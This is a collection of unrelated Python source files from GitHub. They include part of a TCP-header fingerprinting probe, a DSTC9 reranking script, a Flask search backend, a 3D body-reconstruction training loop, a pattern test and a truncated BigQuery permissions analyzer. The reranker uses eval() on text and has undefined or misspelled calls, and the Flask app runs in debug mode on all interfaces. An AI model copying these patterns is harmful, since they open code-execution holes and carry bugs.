tcp_length_with_flags_bin_teil_1[0:4]\n tcp_length_with_flags_bin_teil_2 = bin(ord(tcp_information_default[5]))[2:].zfill(8)\n tcp_window_size = int(tcp_information_default[6])\n result = 0\n if int(ethernet_information[2]) == 2048 and ip_address_source == self.target_ip:\n # print(\"------------TCP-TEST-----------\"\n # \"\\nFrom \", ip_address_source,\n # \"\\n-ttl: \", ip_ttl,\n # \"\\n-tcp-len: \", int(tcp_length, 2) * 4,\n # \"\\n-tcp-flags \", tcp_length_with_flags_bin_teil_1[4:8] + tcp_length_with_flags_bin_teil_2,\n # \"\\n-window-size: \", tcp_window_size)\n result = [ip_ttl, int(tcp_length, 2)*4, tcp_length_with_flags_bin_teil_1[4:8] + tcp_length_with_flags_bin_teil_2, tcp_window_size]\n if int(tcp_length, 2) >= 10:\n print(\"\\nThe TCP-Header provides more information...\")\n tcp_header_option = packet[0][54:74]\n tcp_information_option = struct.unpack('!2s1H1B1s10s1?2s1B', tcp_header_option)\n tcp_mss = tcp_information_option[1]\n tcp_sack_permitted = tcp_information_option[2]\n tcp_no_operation = tcp_information_option[5]\n tcp_window_scale = tcp_information_option[7]\n # print(\n # \"\\n-MSS: \", tcp_mss,\n # \"\\n-SACK-Permitted: \", tcp_sack_permitted,\n # \"\\n-NoOP: \", tcp_no_operation,\n # \"\\n-Window scale: \", tcp_window_scale\n # )\n result.append([tcp_mss, tcp_sack_permitted, tcp_no_operation, tcp_window_scale])\n\n return result\n","repo_name":"eliasarnold/internetandsecurityproject","sub_path":"src/probes/TCPProbe.py","file_name":"TCPProbe.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40527896400","text":"import bert_score\nimport torch\nimport nltk\nimport numpy as np\nimport Levenshtein\nfrom baseline_modify.utils.metrics import (\n UnigramMetric, NGramDiversity,\n CorpusNGramDiversity,\n BLEU, METEOR, ROUGE\n)\nfrom scripts.dataset_walker import DatasetWalker\nfrom scripts.knowledge_reader import KnowledgeReader\nimport re\nimport os\n\nimport sys\nimport json\nimport argparse\nfrom collections import defaultdict\nfrom functools import partial\n\nRE_ART = re.compile(r'\\b(a|an|the)\\b')\nRE_PUNC = re.compile(r'[!\"#$%&()*+,-./:;<=>?@\\[\\]\\\\^`{|}~_\\']')\nPUNC = r'[!\"#$%&()*+,-./:;<=>?@\\[\\]\\\\^`{|}~_\\']'\n\nmetrics = [\n UnigramMetric(metric=\"recall\"),\n UnigramMetric(metric=\"precision\"),\n]\n\ndef splitSentence(paragraph):\n tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')\n sentences = tokenizer.tokenize(paragraph)\n return sentences\n\nclass Metric:\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.score_list = defaultdict(list)\n self.lm_score = []\n self.selection_r1 = []\n self.bertscore = []\n self.refs = []\n self.hyps = []\n\n def _recall_at_k(self, ref_knowledge, hyp_knowledge, k=5):\n relevance = self._match(ref_knowledge, hyp_knowledge)[:k]\n\n if True in relevance:\n result = 1\n else:\n result = 0\n\n return result\n\n def cal_bertscore(self):\n self.bertscore = bert_score.score(self.hyps, self.refs, lang=\"en\")\n\n def update(self, ref_text, hyp_text, lm_score):\n self.refs.append(ref_text.strip())\n self.hyps.append(hyp_text.strip())\n self.lm_score.append(lm_score)\n\n for metric in metrics:\n name = metric.name()\n metric.update((hyp_text, ref_text))\n self.score_list[name].append(metric.compute())\n metric.reset()\n\ndef get_response_and_score_meta(candidate, ver='old'):\n if ver == 'old':\n candidate_list = candidate.split('(')\n candidate_text = '('.join(candidate_list[:-1])\n lm_score = eval(candidate_list[-1][:-1])\n return candidate_text, lm_score\n else:\n return candidate['text'], candidate['score']\n\ndef set_response_and_score_meta(candidate, text, ver='old'):\n if ver == 'old':\n candidate_list = candidate.split('(')\n candidate_text = '('.join(candidate_list[:-1])\n lm_score = eval(candidate_list[-1][:-1])\n candidate = text + f'({lm_score})'\n else:\n candidate['text'] = text\n return candidate\n\ndef set_zeros_lm_score(lm_score, sub_beam_size, group_size):\n lm_score = lm_score.reshape(-1, group_size, sub_beam_size)\n lm_score *= (lm_score.max(dim=-1, keepdim=True)[0]==lm_score)\n lm_score = lm_score.reshape(-1, group_size * sub_beam_size)\n\ndef set_unless_lm(output, beam_size, lm_score, lm_zero, ver='old'):\n item_id = 0\n for pred in output:\n if pred['target']:\n for _id in range(beam_size):\n candidate = pred['beam_outputs'][f'id_{_id}']\n candidate_text, _ = get_response_and_score_meta(candidate, ver)\n if candidate_text[-1].isalnum():\n lm_score.view(-1)[item_id] = lm_zero\n item_id += 1\n\ndef main(argv):\n parser = argparse.ArgumentParser(description='Evaluate the system outputs.')\n\n parser.add_argument('--dataset', dest='dataset', action='store', metavar='DATASET', choices=['train', 'val', 'test'],\n required=True, help='The dataset to analyze')\n parser.add_argument('--dataroot', dest='dataroot', action='store', metavar='PATH', required=True,\n help='Will look for corpus in //...')\n parser.add_argument(\"--knowledge_file\", type=str, default=\"knowledge.json\",\n help=\"knowledge file name.\")\n parser.add_argument(\"--sub_beam_size\", type=int, default=2, help=\"sub_beam_size\")\n parser.add_argument(\"--group_size\", type=int, default=4, help=\"group_size\")\n parser.add_argument('--outfile', dest='outfile', action='store', metavar='JSON_FILE', required=True,\n help='File containing output JSON')\n parser.add_argument('--get_response_version', type=str, default='new')\n parser.add_argument('--from_combine', action='store_true')\n parser.add_argument('--postfile', type=str, default='')\n\n args = parser.parse_args()\n\n with open(args.outfile, 'r') as f:\n output = json.load(f)\n if args.from_combine:\n postfile = args.postfile or re.sub(r'att_(\\d+)_(\\d+)', lambda m: f'att{m.group(2)}', args.outfile).replace('combine', 'post')\n with open(postfile, 'r') as f:\n post_output = json.load(f)\n\n knowledge_reader = KnowledgeReader(dataroot=args.dataroot, knowledge_file=args.knowledge_file)\n beam_size = args.sub_beam_size * args.group_size\n version = args.version\n\n get_response_and_score = partial(get_response_and_score_meta, ver=args.get_response_version)\n\n med_radio_list = []\n med_score_list = []\n whole_knowledge_list = []\n\n metric = Metric()\n for pid, pred in enumerate(output):\n if pred['target']:\n front_txt = []\n post_txt = []\n lm_scores = []\n ref_text = knowledge_reader.get_doc(**pred['knowledge'][0])['doc']['body']\n whole_knowledge_list.append(ref_text)\n p_response = pred['response']\n p_response_list = splitSentence(p_response)\n if len(p_response_list) > 1:\n p_response_list = [' '.join(p_response_list[:i]) for i in range(1, len(p_response_list))]\n p_response_list_med = [Levenshtein.distance(ref_text, candidate_text) for candidate_text in p_response_list]\n p_response_front = p_response_list[int(np.argmin(p_response_list_med))]\n p_response_post = p_response[len(p_response_front)+1:].strip()\n for _id in range(beam_size):\n candidate = pred['beam_outputs'][f'id_{_id}']\n candidate_text, lm_score = get_response_and_score(candidate)\n candidate_text_list = splitSentence(candidate_text)\n if not args.from_combine:\n lm_scores.append(lm_score)\n else:\n post_cadidate = post_output[pid]['beam_outputs'][f'id_{_id}']\n _post_t, post_score = get_response_and_score(post_cadidate)\n lm_scores.append(post_score)\n if len(candidate_text_list) > 1:\n candidate_text_list = [' '.join(candidate_text_list[:i]) for i in range(1, len(candidate_text_list))]\n candidate_text_list_med = [Levenshtein.distance(ref_text, candidate_text) for candidate_text in candidate_text_list]\n candidate_text_after = candidate_text_list[int(np.argmin(candidate_text_list_med))]\n front_txt.append(candidate_text_after)\n if args.from_combine:\n post_txt.append(_post_t)\n else:\n post_txt.append(candidate_text[len(candidate_text_after)+1:].strip())\n candidate_text = candidate_text_after\n else:\n front_txt.append(candidate_text)\n post_txt.append(candidate_text)\n dis_func = Levenshtein.jaro_winskler\n med_radio_list.append(dis_func(candidate_text, ref_text))\n metric.update(ref_text, candidate_text, lm_score)\n\n scores = metric.score_list\n\n metric.cal_bertscore()\n bert_score = metric.bertscore\n lm_score = metric.lm_score\n\n bert_score = bert_score[2].reshape((-1, beam_size))\n lm_score = torch.tensor(lm_score).reshape((-1, beam_size))\n\n med_radio_score = torch.tensor(med_radio_list).reshape((-1, beam_size))\n lm_score = (lm_score - lm_score.min())/(lm_score.max() - lm_score.min())\n set_zeros_lm_score(lm_score, args.sub_beam_size, args.group_size)\n bert_score -= bert_score.min(dim=-1, keepdim=True)[0]\n bert_score /= bert_score.max(dim=-1, keepdim=True)[0]\n med_part = torch.where(med_radio_score > 0.9, med_radio_score, torch.zeros_like(med_radio_score)) * 0.5\n final_score = bert_score + lm_score - med_part\n print(med_radio_score[0])\n print(bert_score[0], lm_score[0], med_part[0])\n\n select = final_score.argmax(dim=-1)\n\n item_id = 0\n for pred in output:\n if pred['target']:\n candidate_text, _ = get_response_and_score(pred['beam_outputs'][f'id_{select[item_id].item()}'])\n pred['response'] = candidate_text\n item_id += 1\n\n with open(os.path.join(args.outfile[:-5] + f'_rerank{version}.json'), 'w') as fout:\n json.dump(output, fout, indent=2)\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"lxchtan/DSTC9-Track1","sub_path":"data_util/rerank_candidate.py","file_name":"rerank_candidate.py","file_ext":"py","file_size_in_byte":8111,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"9116169218","text":"#!/usr/bin/env python3\n\nfrom log2plot import Logger, Vec, copy\nimport os\nfrom numpy.random import randn\n\nlogger = Logger(os.path.dirname(__file__) + '/../')\n\n# v is an underlying std::vector that is the C++ object\nv = Vec(4)\nlogger.save(v, 'python', 'x_', 'x-value')\nlogger.setLineType('[C0, r.-, go, k--]')\n\nfor _ in range(100):\n\n actual_vector = randn(4)\n # we have to copy the values to v\n copy(actual_vector, v)\n\n logger.update()\n\nlogger.plot()\n","repo_name":"oKermorgant/log2plot","sub_path":"examples/src/from_python.py","file_name":"from_python.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"36243226700","text":"from flask import Flask, request, render_template, g\nfrom flask_cors import CORS\nimport os\nimport indexer\nimport wordvec\nimport xapian\nimport logging\nfrom time import time\n\nDATA = os.environ['DATA']\nMODEL = os.environ['WORD2VEC_MODEL']\n\ndef xapian_database():\n if 'db' not in g:\n path = os.path.join(DATA, 'xapian_index')\n g.db = xapian.Database(path)\n return g.db\n\ndef load_model():\n print(\"[Loading word2vec model]\")\n start = time()\n model = wordvec.load_model(MODEL)\n print(\"\\t loaded in %.2f seconds\" % (time() - start))\n return model\n\napp = Flask(__name__)\napp.logger.setLevel(logging.INFO)\ncors = CORS(app)\nword2vec_model = load_model()\n\n@app.route(\"/\")\ndef Index():\n return \"This is the search engine backend\"\n\n@app.route(\"/search\")\ndef Search():\n q = request.args.get('q', \"\").strip()\n expand = request.args.get('expand')\n offset = request.args.get('offset')\n limit = request.args.get('limit')\n prefix = request.args.get('prefix', 'S')\n\n try:\n offset = int(offset)\n except:\n offset = None\n\n try:\n limit = int(limit)\n except:\n limit = None\n\n if not q:\n return dict(error=\"Empty query\")\n else:\n if expand:\n expand_args = dict(model=word2vec_model, threshold=0.7)\n else:\n expand_args = None\n\n return indexer.query(xapian_database(), \n q, \n prefix,\n offset, limit, \n expand_args)\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=8998, debug=True)\n","repo_name":"RJMillerLab/opendata-keyword-search","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17805436877","text":"import torch\r\nimport numpy as np\r\nfrom dataset.dataset import getDatasetAndLoader\r\nfrom model import getOptNet\r\nfrom pyhocon import ConfigFactory,HOCONConverter\r\nimport argparse\r\nimport trimesh\r\nimport os\r\nimport os.path as osp\r\nfrom MCAcc import Seg3dLossless\r\nimport utils\r\nparser = argparse.ArgumentParser(description='neu video body rec')\r\nparser.add_argument('--gpu-ids',nargs='+',type=int,metavar='IDs',\r\n\t\t\t\t\thelp='gpu ids')\r\nparser.add_argument('--conf',default=None,metavar='M',\r\n\t\t\t\t\thelp='config file')\r\nparser.add_argument('--data',default=None,metavar='M',\r\n\t\t\t\t\thelp='data root')\r\nparser.add_argument('--model',default=None,metavar='M',\r\n\t\t\t\t\thelp='pretrained scene model')\r\nparser.add_argument('--model-rm-prefix',nargs='+',type=str,metavar='rm prefix', help='rm model prefix')\r\nparser.add_argument('--sdf-model',default=None,metavar='M',\r\n\t\t\t\t\thelp='substitute sdf model')\r\nparser.add_argument('--save-folder',default=None,metavar='M',help='save folder')\r\nargs = parser.parse_args()\r\n\r\n\r\n#point render\r\nresolutions={'coarse':\r\n[\r\n\t(14+1, 20+1, 8+1),\r\n\t(28+1, 40+1, 16+1),\r\n\t(56+1, 80+1, 32+1),\r\n\t(112+1, 160+1, 64+1),\r\n\t(224+1, 320+1, 128+1),\r\n],\r\n'medium':\r\n[\r\n\t(18+1, 24+1, 12+1),\r\n\t(36+1, 48+1, 24+1),\r\n\t(72+1, 96+1, 48+1),\r\n\t(144+1, 192+1, 96+1),\r\n\t(288+1, 384+1, 192+1),\r\n],\r\n'fine':\r\n[\r\n\t(20+1, 26+1, 14+1),\r\n\t(40+1, 52+1, 28+1),\r\n\t(80+1, 104+1, 56+1),\r\n\t(160+1, 208+1, 112+1),\r\n\t(320+1, 416+1, 224+1),\r\n]\r\n}\r\n\r\nresolutions_higher = [\r\n\t(32+1, 32+1, 32+1),\r\n\t(64+1, 64+1, 64+1),\r\n\t(128+1, 128+1, 128+1),\r\n\t(256+1, 256+1, 256+1),\r\n\t(512+1, 512+1, 512+1),\r\n]\r\n\r\n\r\n\r\nconfig=ConfigFactory.parse_file(args.conf)\r\nif len(args.gpu_ids):\r\n\tdevice=torch.device(args.gpu_ids[0])\r\nelse:\r\n\tdevice=torch.device(0)\r\ndata_root=args.data\r\nif args.save_folder is None:\r\n\tprint('please set save-folder...')\r\n\tassert(False)\r\n\r\nsave_root=osp.join(data_root,args.save_folder)\r\ndebug_root=osp.join(save_root,'debug')\r\nos.makedirs(save_root,exist_ok=True)\r\nos.makedirs(debug_root,exist_ok=True)\r\n# save the config file\r\nwith open(osp.join(save_root,'config.conf'),'w') as ff:\r\n\tff.write(HOCONConverter.convert(config,'hocon'))\r\ncondlen={'deformer':config.get_int('mlp_deformer.condlen'),'renderer':config.get_int('render_net.condlen')}\r\nbatch_size=config.get_int('train.coarse.point_render.batch_size')\r\ndataset,dataloader=getDatasetAndLoader(data_root,condlen,batch_size,\r\n\t\t\t\t\t\tconfig.get_bool('train.shuffle'),config.get_int('train.num_workers'),\r\n\t\t\t\t\t\tconfig.get_bool('train.opt_pose'),config.get_bool('train.opt_trans'),config.get_config('train.opt_camera'))\r\n\r\n# bmins=[-0.8,-1.25,-0.4]\r\n# bmaxs=[0.8,0.7,0.4]\r\n# use adaptive box computation\r\nbmins=None\r\nbmaxs=None\r\n\r\nif config.get_int('train.initial_iters')<=0:\r\n\tuse_initial_sdf=True\r\nelse:\r\n\tuse_initial_sdf=False\r\noptNet,sdf_initialized=getOptNet(dataset,batch_size,bmins,bmaxs,resolutions['coarse'],device,config,use_initial_sdf)\r\noptNet,dataloader=utils.set_hierarchical_config(config,'coarse',optNet,dataloader,resolutions['coarse'])\r\n\r\n\r\nif args.model is not None and osp.isfile(args.model):\r\n\tprint('load model: '+args.model,end='')\r\n\tif args.sdf_model is not None:\r\n\t\tprint(' and substitute sdf model with: '+args.sdf_model,end='')\r\n\t\tsdf_initialized=-1\r\n\tprint()\r\n\toptNet,dataset=utils.load_model(args.model,optNet,dataset,device,args.sdf_model,args.model_rm_prefix)\r\n\r\nprint('box:')\r\nprint(optNet.engine.b_min.view(-1).tolist())\r\nprint(optNet.engine.b_max.view(-1).tolist())\r\noptNet.train()\r\n\r\nif sdf_initialized>0:\r\n\toptNet.initializeTmpSDF(sdf_initialized,osp.join(data_root,'initial_sdf_idr'+'_%d_%d.pth'%(config.get_int('sdf_net.multires'),config.get_int('train.skinner_pose_type'))),True)\r\n\tengine = Seg3dLossless(\r\n\t\t\tquery_func=None, \r\n\t\t\tb_min = optNet.engine.b_min,\r\n\t\t\tb_max = optNet.engine.b_max,\r\n\t\t\tresolutions=resolutions['coarse'],\r\n\t\t\talign_corners=False,\r\n\t\t\tbalance_value=0.0, # be careful\r\n\t\t\tvisualize=False,\r\n\t\t\tdebug=False,\r\n\t\t\tuse_cuda_impl=False,\r\n\t\t\tfaster=False \r\n\t\t).to(device)\r\n\tverts,faces=optNet.discretizeSDF(-1,engine)\r\n\tmesh = trimesh.Trimesh(verts.cpu().numpy(), faces.cpu().numpy())\r\n\r\n\tmesh.export(osp.join(data_root,'initial_sdf_idr'+'_%d_%d.ply'%(config.get_int('sdf_net.multires'),config.get_int('train.skinner_pose_type'))))\r\n\r\n\r\nlearnable_ws=dataset.learnable_weights()\r\n\r\n\r\n\r\noptimizer = torch.optim.Adam([{'params':learnable_ws},{'params':[p for p in optNet.parameters() if p.requires_grad]}], lr=config.get_float('train.learning_rate'))\r\nscheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, config.get_list('train.scheduler.milestones'), gamma=config.get_float('train.scheduler.factor'))\r\n\r\nratio={'sdfRatio':None,'deformerRatio':None,'renderRatio':None}\r\nopt_times=0.\r\nnepochs=config.get_int('train.nepoch')\r\nsample_pix_num=config.get_int('train.sample_pix_num')\r\nin_fine_hie=False\r\nfor epoch in range(0,nepochs+1):\t\r\n\tif config.get_int('train.medium.start_epoch')>=0 and epoch==config.get_int('train.medium.start_epoch'):\r\n\t\toptNet,dataloader=utils.set_hierarchical_config(config,'medium',optNet,dataloader,resolutions['medium'])\r\n\t\ttorch.cuda.empty_cache()\r\n\t\tprint('enable medium hierarchical')\r\n\t\tutils.save_model(osp.join(save_root,\"coarse.pth\"),epoch,optNet,dataset)\r\n\tif config.get_int('train.fine.start_epoch')>=0 and epoch==config.get_int('train.fine.start_epoch'):\r\n\t\toptNet,dataloader=utils.set_hierarchical_config(config,'fine',optNet,dataloader,resolutions['fine'])\r\n\t\tprint('enable fine hierarchical')\r\n\t\ttorch.cuda.empty_cache()\r\n\t\tutils.save_model(osp.join(save_root,\"medium.pth\"),epoch,optNet,dataset)\r\n\t\tin_fine_hie=True\r\n\t# for data_index, (frame_ids, imgs, masks, albedos) in enumerate(dataloader):\r\n\tfor data_index, (frame_ids, outs) in enumerate(dataloader):\r\n\t\tframe_ids=frame_ids.long().to(device)\r\n\t\toptimizer.zero_grad()\r\n\r\n\t\tratio['sdfRatio']=1.\r\n\t\tratio['deformerRatio']=opt_times/2500.+0.5\r\n\t\tratio['renderRatio']=1.\r\n\t\tloss=optNet(outs,sample_pix_num,ratio,frame_ids,debug_root)\t\t\r\n\t\tloss.backward()\t\r\n\t\toptNet.propagateTmpPsGrad(frame_ids,ratio)\r\n\t\toptimizer.step()\r\n\t\tif data_index%1==0:\r\n\t\t\toutinfo='(%d/%d): loss = %.5f; color_loss: %.5f, eikonal_loss: %.5f'%(epoch,data_index,loss.item(),optNet.info['color_loss'],optNet.info['grad_loss'])+ \\\r\n\t\t\t\t\t(' normal_loss: %.5f,'%optNet.info['normal_loss'] if 'normal_loss' in optNet.info else '')+ \\\r\n\t\t\t\t\t(' def_loss: %.5f,'%optNet.info['def_loss'] if 'def_loss' in optNet.info else '')+ \\\r\n\t\t\t\t\t(' offset_loss: %.5f,'%optNet.info['offset_loss'] if 'offset_loss' in optNet.info else '')+ \\\r\n\t\t\t\t\t(' dct_loss: %.5f,'%optNet.info['dct_loss'] if 'dct_loss' in optNet.info else '')\r\n\t\t\toutinfo+='\\n'\r\n\t\t\toutinfo+='\\tpc_sdf_l: %.5f'%(optNet.info['pc_loss_sdf'])\r\n\t\t\toutinfo+=';\\tpc_norm_l: %.5f; '%(optNet.info['pc_loss_norm']) if 'pc_loss_norm' in optNet.info else '; '\r\n\t\t\tfor k,v in optNet.info['pc_loss'].items():\r\n\t\t\t\toutinfo+=k+': %.5f\\t'%v\r\n\t\t\toutinfo+='\\n\\trayInfo(%d,%d)\\tinvInfo(%d,%d)\\tratio: (%.2f,%.2f,%.2f)\\tremesh: %.3f'%(*optNet.info['rayInfo'],*optNet.info['invInfo'],ratio['sdfRatio'],ratio['deformerRatio'],ratio['renderRatio'],optNet.info['remesh'])\r\n\t\t\tprint(outinfo)\r\n\r\n\t\topt_times+=1.\r\n\tif in_fine_hie:\r\n\t\toptNet.draw=True\r\n\tutils.save_model(osp.join(save_root,\"latest.pth\"),epoch,optNet,dataset)\r\n\tscheduler.step()","repo_name":"jby1993/SelfReconCode","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7233,"program_lang":"python","lang":"en","doc_type":"code","stars":381,"dataset":"github-code","pt":"53"} +{"seq_id":"72994721769","text":"import pytest\n\nfrom supriya.patterns import EventPattern, NoteEvent, SequencePattern, UpdatePattern\nfrom supriya.patterns.testutils import MockUUID as M\nfrom supriya.patterns.testutils import run_pattern_test\n\n\n@pytest.mark.parametrize(\n \"stop_at, input_a, input_b1, input_b2, input_c, expected, is_infinite\",\n [\n (\n None,\n SequencePattern([1, 2, 3]),\n SequencePattern([4, 5]),\n SequencePattern([7, 8, 9]),\n SequencePattern([10, 11]),\n [NoteEvent(M(\"A\"), a=1, b=7, c=10), NoteEvent(M(\"B\"), a=2, b=8, c=11)],\n False,\n ),\n (\n None,\n SequencePattern([1, 2, 3], None),\n SequencePattern([4, 5], None),\n SequencePattern([7, 8, 9]),\n SequencePattern([10, 11]),\n [NoteEvent(M(\"A\"), a=1, b=7, c=10), NoteEvent(M(\"B\"), a=2, b=8, c=11)],\n False,\n ),\n (\n None,\n SequencePattern([1, 2, 3], None),\n SequencePattern([4, 5], None),\n SequencePattern([7, 8, 9], None),\n SequencePattern([10, 11], None),\n [\n NoteEvent(M(\"A\"), a=1, b=7, c=10),\n NoteEvent(M(\"B\"), a=2, b=8, c=11),\n NoteEvent(M(\"C\"), a=3, b=9, c=10),\n NoteEvent(M(\"D\"), a=1, b=7, c=11),\n NoteEvent(M(\"E\"), a=2, b=8, c=10),\n NoteEvent(M(\"F\"), a=3, b=9, c=11),\n ],\n True,\n ),\n ],\n)\ndef test(stop_at, input_a, input_b1, input_b2, input_c, expected, is_infinite):\n pattern = UpdatePattern(EventPattern(a=input_a, b=input_b1), b=input_b2, c=input_c)\n run_pattern_test(pattern, expected, is_infinite, stop_at)\n","repo_name":"josiah-wolf-oberholtzer/supriya","sub_path":"tests/patterns/test_UpdatePattern.py","file_name":"test_UpdatePattern.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"53"} +{"seq_id":"527795528","text":"\"\"\"This analyzer uses data from BigQuery and GCP IAM to list all possible permissions to BigQuery tables/views.\n\nBigquery authorization is based on GCP IAM.\nWith IAM, you manage access control by defining who (identity) has what access (role) for which resource.\nIn IAM, permission to access a resource isn't granted directly to the end user,\nInstead, permissions are grouped into roles, and roles are granted to authenticated principals.\nThis model for access management has three main parts:\n\nPrincipal:\nA principal can be a Google Account (for end users).\nA service account (for applications and compute workloads).\nA Google group.\nA Google Workspace account or Cloud Identity domain that can access a resource.\nEach principal has its own identifier, which is typically an email address.\n\nRole:\nA role is a collection of permissions.\nPermissions determine what operations are allowed on a resource.\nWhen you grant a role to a principal, you grant all the permissions that the role contains.\n\nPolicy:\nThe allow policy is a collection of role bindings that bind one or more principals to individual roles.\nWhen you want to define who (principal) has what type of access (role) on a resource,\nyou create an allow policy and attach it to the resource.\n\nYou can grant access to a project.\nMost services support IAM permission with finer granularity,\nlike access to specific bucket at the storage and etc'.\n\nThere are several kinds of roles in IAM:\nBasic roles: Roles historically available in the Google Cloud console. These roles are Owner, Editor, and Viewer.\nPredefined roles\nCustom roles\n\nResource hierarchy\n\nThe organization is the root node in the hierarchy.\nFolders are children of the organization.\nProjects are children of the organization, or of a folder.\nResources for each service are descendants of projects.\n\nResources inherit the allow policies of all of their parent resources\n\nThe canonical structure of a the authorization graph is as follows:\nTable - may have permissions defined directly on it and inherits the permissions from the dataset.\nDataset - may have permissions defined directly on it and potentially inherits some permissions from the project.\nProject - may have permissions defined directly on it and inherits the permissions from the folder it's contained in.\nFolder - may have permissions defined directly on it and inherits the permissions from its parent folder(s) or organization\nOrganization - may have permissions defined directly on it\nPermissions are defined using roles, see the mapping of role to permissions in the policy_tree module.\n\"\"\"\n\nimport json\nfrom dataclasses import dataclass\nfrom logging import Logger\nfrom pathlib import Path\nfrom typing import Any, List, Optional, Union\n\nfrom google.api_core.page_iterator import Iterator # type: ignore\nfrom google.cloud.bigquery.table import TableListItem # type: ignore\nfrom google.oauth2.service_account import Credentials # type: ignore\n\nfrom universal_data_permissions_scanner.datastores.bigquery.policy_tree import (\n GRANTED_BY_TO_PATHZ_ELEMENT,\n READ_PERMISSIONS,\n WRITE_PERMISSIONS,\n CustomPermission,\n DatasetPolicyNode,\n Member,\n PolicyNode,\n TableIamPolicyNode,\n)\nfrom universal_data_permissions_scanner.datastores.bigquery.service import BigQueryService\nfrom universal_data_permissions_scanner.models.model import (\n Asset,\n AssetType,\n AuthzEntry,\n AuthzNote,\n AuthzPathElement,\n AuthzPathElementType,\n Identity,\n PermissionLevel,\n)\nfrom universal_data_permissions_scanner.utils.logger import get_logger\nfrom universal_data_permissions_scanner.writers import BaseWriter\nfrom universal_data_permissions_scanner.writers.base_writers import DEFAULT_OUTPUT_FILE, OutputFormat\nfrom universal_data_permissions_scanner.writers.get_writers import get_writer\n\n\n@dataclass\nclass BigQueryAuthzAnalyzer:\n \"\"\"BigQuery authorization analyzer.\"\"\"\n\n logger: Logger\n service: BigQueryService\n writer: BaseWriter\n\n @classmethod\n def connect(\n cls,\n project_id: str,\n logger: Optional[Logger] = None,\n output_format: OutputFormat = OutputFormat.CSV,\n output_path: Union[Path, str] = Path.cwd() / DEFAULT_OUTPUT_FILE,\n credentials_str: Optional[str] = None,\n **kwargs: Any,\n ):\n \"\"\"Connect to BigQuery and return an instance of the analyzer.\n\n Args:\n project_id (str): GCP project id to analyze.\n logger (Optional[Logger], optional): Python logger. Defaults to None.\n output_format (OutputFormat, optional): file format to export. Defaults to OutputFormat.CSV.\n output_path (Union[Path, str], optional): Path to write the file. Defaults to ./authz-analyzer-export.\n credentials_str (Optional[str], optional): ServiceAccount to connect to BigQuery. Defaults to None.\n \"\"\"\n writer = get_writer(filename=output_path, output_format=output_format)\n if logger is None:\n logger = get_logger(False)\n if credentials_str is not None:\n credentials = Credentials.from_service_account_info(json.loads(credentials_str)) # type: ignore\n big_query_service = BigQueryService.load(project_id, credentials=credentials, **kwargs)\n else:\n big_query_service = BigQueryService.load(project_id, **kwargs)\n return cls(logger, big_query_service, writer=writer)\n\n def run(self) -> None:\n \"\"\"Read all tables in all datasets and calculate authz paths\"\"\"\n self.logger.info(\"Starting BigQuery authorization analysis for project %s\", self.service.project_id)\n project_node = self.service.lookup_project(self._resolve_custom_role_to_permissions)\n for dataset_id in self.service.list_datasets():\n self.logger.info(\"Scanning dataset %s\", dataset_id)\n dataset = self.service.get_dataset(dataset_id)\n dataset_node = DatasetPolicyNode(dataset, self._resolve_custom_role_to_permissions)\n dataset_node.set_parent(project_node)\n tables: Iterator = self.service.list_tables(dataset_id)\n table: TableListItem\n for table in tables:\n fq_table_id = f\"{table.project}.{table.dataset_id}.{table.table_id}\" # type: ignore\n table_iam = self.service.get_table_policy(table.reference)\n name: str = table.table_id # type: ignore\n table_node = TableIamPolicyNode(\n table_id=fq_table_id,\n name=name,\n policy=table_iam,\n resolve_permission_callback=self._resolve_custom_role_to_permissions,\n )\n table_node.set_parent(dataset_node)\n self._calc(Asset([fq_table_id], type=AssetType.TABLE), table_node, [])\n self.writer.close()\n\n def _calc(\n self,\n fq_table_id: Asset,\n node: PolicyNode,\n path: List[AuthzPathElement],\n permissions: Optional[List[PermissionLevel]] = None,\n ):\n \"\"\"\n Calculates permissions on the policy node and recursively search for more permissions\n on the nodes it references or its parent node.\n \"\"\"\n\n if permissions is None:\n permissions = [PermissionLevel.READ, PermissionLevel.WRITE, PermissionLevel.FULL]\n self.logger.debug(\n \"calc for %s %s %s permissions = %s path = %s}\",\n fq_table_id,\n node.type,\n node.name,\n permissions,\n list(map(lambda x: x.type, path)),\n )\n # Start by listing all immediate permissions defined on this node\n for permission in permissions:\n for member in node.get_members(permission):\n self._report_permission(fq_table_id, node, member, permission, path) # type: ignore\n\n # Then go to each reference and get the permissions from it\n for permission in permissions:\n for member in node.get_references(permission):\n ref_node = self.service.lookup_ref(member.name, self._resolve_custom_role_to_permissions)\n if ref_node is None:\n self.logger.error(\"Unable to find ref_node for member %s\", member)\n continue\n note = f\"{node.type} references {ref_node.type.lower()} {ref_node.name} with permission {permission}\"\n self._add_to_path(path, node, note, member.db_permissions)\n self._calc(fq_table_id, ref_node, path, permissions=[permission])\n path.pop()\n\n # Finally, go to the parent and get the inherited permissions\n if node.parent is not None:\n self._goto_parent(fq_table_id, node, path, permissions)\n\n def _goto_parent(\n self, fq_table_id: Asset, node: PolicyNode, path: List[AuthzPathElement], permissions: List[PermissionLevel]\n ):\n note = f\"{node.type.lower()} {node.name} is included in {node.parent.type.lower()} {node.parent.name}\" # type: ignore\n self._add_to_path(path, node, note, [])\n self._calc(fq_table_id, node.parent, path, permissions) # type: ignore\n path.pop()\n\n def _add_to_path(\n self, path: List[AuthzPathElement], node: PolicyNode, note: str, db_permissions: Optional[List[str]]\n ):\n if db_permissions is None:\n db_permissions = []\n self.logger.debug(\"Adding %s %s to path\", node.type, node.name)\n authz_type = GRANTED_BY_TO_PATHZ_ELEMENT[node.type]\n path.append(\n AuthzPathElement(\n node.id, node.name, authz_type, 